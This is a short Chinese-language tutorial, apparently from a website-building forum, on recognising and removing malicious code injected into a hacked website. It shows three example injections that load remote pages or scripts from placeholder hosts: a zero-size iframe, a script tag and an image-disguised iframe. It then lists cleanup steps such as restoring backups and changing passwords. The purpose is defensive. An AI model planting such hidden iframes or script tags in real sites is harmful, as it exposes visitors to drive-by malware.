网站被黑挂马怎么解决
一个网站做好之后,网站安全相当重要。如果忽视了网站安全,就容易造成网站被黑挂马。下面学做网站论坛介绍一下如果网站出现了被黑挂马之后,应该怎么解决。
解决网站被黑挂马之后,我们认识一些常见的挂马方式。
(1)iframe 框架挂马
<iframe src=http://www.xxx.com/xxx.html width=0 height=0></iframe>
这种嵌入是的挂马特别常见,在Google中搜索发现的可能还有木马的网页,一般都是被这种方式挂马。这行语句就是在网页打开的时候,同时打开另外一个网页,当然这个网页可能包含大量的木马,也可能仅仅是为了骗取流量。
(2)script 挂马
<script src=http://xxx.cn/yyy.js></script>
通过script的调用来挂马,可以挂直接的html文件,也可以挂js文件,可以明文挂马,为了躲避追查,也有加密挂马的形式,形式各异,千差万别。
3)图片伪装挂马
<html>
<iframe src=”http://www.x.com/x.htm” height=0 width=0></iframe><img src=”http://www.x.com/x.jpg”>
</html>
攻击者将类似:http://www.xxx.com/x.htm中的木马代码植入到x.gif图片文件中,这些嵌入代码的图片都可以用工具生成。图片木马生成后,再利用代码调用执行,是比较新颖的一种挂马隐蔽方法。
以下就是三种常见的挂马方式。如果我们网站现现被黑挂马,我们首先要检查自己的网站代码里有没有以上三种类型的代码,如果有,立即删除。
当然还会有其它类型的挂马方式,所以下面介绍一下彻底解决网站被黑挂马的方法。
- 首先清空自己网站空间里的所有程序文件和数据库;
- 使用自己网站在正常情况下的备份进行还原操作;(相关知识:如何进行网站备份)
- 修改所有空间后台密码、FTP登录密码,越复杂越好;
- 经常的升级自己网站的程序,保证程序本身安全。(程序升级方法见仿站教程第三节)
这样就可以有效的解决网站被黑挂马的问题了。
